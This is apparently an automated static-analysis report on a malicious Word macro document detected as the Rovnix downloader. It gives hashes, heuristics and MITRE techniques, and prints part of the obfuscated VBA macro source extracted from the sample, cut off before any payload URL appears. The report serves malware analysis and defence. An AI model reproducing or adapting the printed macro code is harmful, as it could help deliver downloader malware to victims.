Rovnix — Office (OOXML) malware analysis

Static analysis result for SHA-256 2f1ba123b907b670…

MALICIOUS

Office (OOXML)

76.5 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-04-06
MD5: 14d7193a97f997ec91c3f96cae313cdc SHA-1: fe266d93a7c39e564dd94e9d8c4b217977064af4 SHA-256: 2f1ba123b907b6706e46991d1fce4e4fab12d7bc085ee3f1c0833de59b03cacf
262 Risk Score

Malware Insights

Rovnix · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Rovnix-6497736-0. Static analysis reveals the presence of VBA macros, specifically an Auto_Close macro that utilizes CreateObject to execute code. The script attempts to run a function named 'cdoykgkdcvkwyq' and 'rbwbffkzjqwxjbzjxy', indicating it's designed to download and execute a secondary payload. The presence of the 'Rovnix' family signature and the downloader behavior strongly suggest this attack pattern.

Heuristics 6

  • ClamAV: Doc.Downloader.Rovnix-6497736-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Rovnix-6497736-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 20653 bytes
SHA-256: 55263cb74b373b6d9e286147e2b293a590e6d7fc636f26fd48bc757651f35942
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub dwfdvjqwbovzqz()
  zwrubku = "of" + "qfjr" + "juu" + Left("yzviixquyz", 10) + Left("kzcbvkgbco", 1)
ocnbikjycy = "wrgg" + "vbvrnvjkox" + Left("vukdgbivwi", 10) + Left("iiynjvfnjj", 10)
kwcqfjdjnqwo = Left("cizdvzogjf", 1) + "fyqdgqury" + "jn"
jrvowvf = Left("ooqyobginb", 6) + "fodzfibjf" + "gvrj" + "jkkwffowi"
  Application.Run "cdoykgkdcvkwyq"
  iurokdvq = "iznkuwy" + "ngquonvrxuujx" + "jnx" + Left("ovbrkwdurd", 2)
vfzgjikjivr = Left("cjwbnnrzgg", 4) + "cgz" + "ckkobjvudg" + "ccjq"
nrzovkvxcycw = RTrim("bwfioyyuuvqdcknoongfq") + "fvbfxqxuogoxrwgofwrbrjbgzdbkr"
dofcdfnbjxx = "fqjduniidvcqorkzq" + "ivxfiydorokwbkznkvvoogckj"
ndriyicrkgdn = "fdbuozqriukdoq" + "iwgndojwvyybjv" + Left("ukwzbwqkzf", 7)
End Sub
Sub rgfykdcwxoxvvj()
  oinbzzzbnrd = xikcbgggkdgwvgwyf(3494) + xikcbgggkdgwvgwyf(1408) + 1659 + 2818 + 3875 + xikcbgggkdgwvgwyf(4830) + xikcbgggkdgwvgwyf(2739)
brzxwcxz = RTrim("xcdckvcqzjfnxbwnfj") + "kuygxyoovo" + "dwfvbqcoyncczigczkbrc" + RTrim("grb")
  Application.Run "rbwbffkzjqwxjbzjxy"
  dbbxyvfj = xikcbgggkdgwvgwyf(3901) + xikcbgggkdgwvgwyf(1105) + xikcbgggkdgwvgwyf(4751) + 4628
fuyzucvkq = "wxrqo" + RTrim("bvjdwfwnjbuqfzgbogju") + "cjdcdquyjrn" + RTrim("urby") + RTrim("nuijjfjyyfgnzrrvwzq")
xdvwjbgwbvyv = RTrim("qddxfnufzcuckynnouqqroj") + LTrim("brzgoxjgdcdwwgxo") + "vyucdqniyrcxwjyyzrby"
bxfzvvxcwr = LTrim("idgyccfrfb") + RTrim("nqdjqwfdfbzvbxu") + "jbzyfdwdcyfwjzgixf" + RTrim("byo")
End Sub
Function xikcbgggkdgwvgwyf(X)
 xikcbgggkdgwvgwyf = Atn(X) - Atn(1)
End Function

Public Function cyfgcvvrzgdfqvx(qgkkyqbyoizzjczy, bgqfunjrdybdbibikw, zydruqqnkcwzq)
  rwgzyqdj = "f" + "nbqryiuwfbxfqbzjvv" + "yuyxyrzvqnfggruuxdcvrjjqkkfbr" + "dbiwfc"
oggvgcrxnbnc = xikcbgggkdgwvgwyf(2929) + xikcbgggkdgwvgwyf(2345) + xikcbgggkdgwvgwyf(1861)
ivrzorg = "cqrkycvfjwzcug" + "kgjxuduycjyi"
vkuvxbj = "yrccjwyiwqvd" + Left("fbruqwqvov", 3) + Left("vvfufkjwwg", 8)
  cyfgcvvrzgdfqvx = Replace(qgkkyqbyoizzjczy, bgqfunjrdybdbibikw, zydruqqnkcwzq)
  ovgcbog = LTrim("jywrxrggjyciqzxzvuovqnnwjcwu") + "qxwuzqcvzcrzgbvxwuijgvqyvoo" + RTrim("wqgcnrfydcrvu") + LTrim("bogbdwcgboigijgqznvdv") + RTrim("dgifqkkqfqrkvznvkn") + RTrim("gvrvrfbuonncwgr")
bgrouui = 1285 - xikcbgggkdgwvgwyf(336) - 3054
xngxzqzy = xikcbgggkdgwvgwyf(4460) + xikcbgggkdgwvgwyf(2170)
cuurvffg = "ykivzkkkixqn" + RTrim("xibkgvzdjnjgcnvjrdivyoq")
wuqioduvfdv = 3967 - xikcbgggkdgwvgwyf(536) - 4289 - xikcbgggkdgwvgwyf(3610)
uzfnjgvur = "czubifuijnjb" + Left("ikibkcdodz", 7) + Left("xrdzugkodf", 7) + Left("vvdvqzuqyd", 2)
  ufufxnii = Left("iwnfvgwwvw", 10) + "fiwcgjini" + "cicwxjv" + "wiqjfbn"
vqrqdwbdxr = "qo" + Left("kckybvvgin", 7) + Left("vfcnncqrfj", 7) + Left("qygxxqxiwn", 1)
dxwfrnfgw = "qvzvqgczwu" + "kgudguzgofjndrqkjqukdygfufkx" + LTrim("fxikir") + LTrim("bzboyfw")
ciiirwr = xikcbgggkdgwvgwyf(1418) - 3684 - 876
zynqzzugwucf = xikcbgggkdgwvgwyf(2422) + 174 + 2289 + xikcbgggkdgwvgwyf(2084) + 2593 + xikcbgggkdgwvgwyf(592)
  qcyfowyvgxj = xikcbgggkdgwvgwyf(3834) - 4561 - xikcbgggkdgwvgwyf(4903) - xikcbgggkdgwvgwyf(3882) - 1798 - 505
irxgwzybciw = "nwnx" + "uzjiuor" + "cvjvknodwn" + Left("zdiidijxci", 4) + "dd"
wgjcnddjgc = 515 - 1783 - xikcbgggkdgwvgwyf(1254)
gdzuououjcyc = 2403 - xikcbgggkdgwvgwyf(3239) - xikcbgggkdgwvgwyf(1480) - 945 - xikcbgggkdgwvgwyf(4814)
fkfcfoijbxjv = 3844 - 3957 - xikcbgggkdgwvgwyf(1397)
End Function

Sub rbwbffkzjqwxjbzjxy()
 vknvvgnccxx = "ycyciud" + "wuqugyfbgfkvibibcinqbqbubwqbik"
gwfoocuqwwiz = RTrim("ocgxodnkgfwdwnczvrqkfzgkvdjnn") + "znwzkojyiivvvbw" + "xngvwxzrzzrkdx" + RTrim("rvqgugbfcnxwjdnkukvdqbykdgydbw")
cxzrjukynz = Left("ybjoigubbc", 4) + "rgwfruwuwyzd"
ndwyxfzy = Left("orwgrrorfj", 2) + Left("bjbrjrofrv", 4) + Left("cyzdngxjgv", 4)
kgkdcvkwyqbq = 742 + xikcbgggkdgwvgwyf(636) + xikcbgggkdgwvgwyf
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 47104 bytes
SHA-256: e90e8ceaa72c3e122ccc8ff966f684430e644024efb3adc5283f82e37c5cb21d
Detection
ClamAV: Doc.Downloader.Rovnix-6497736-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.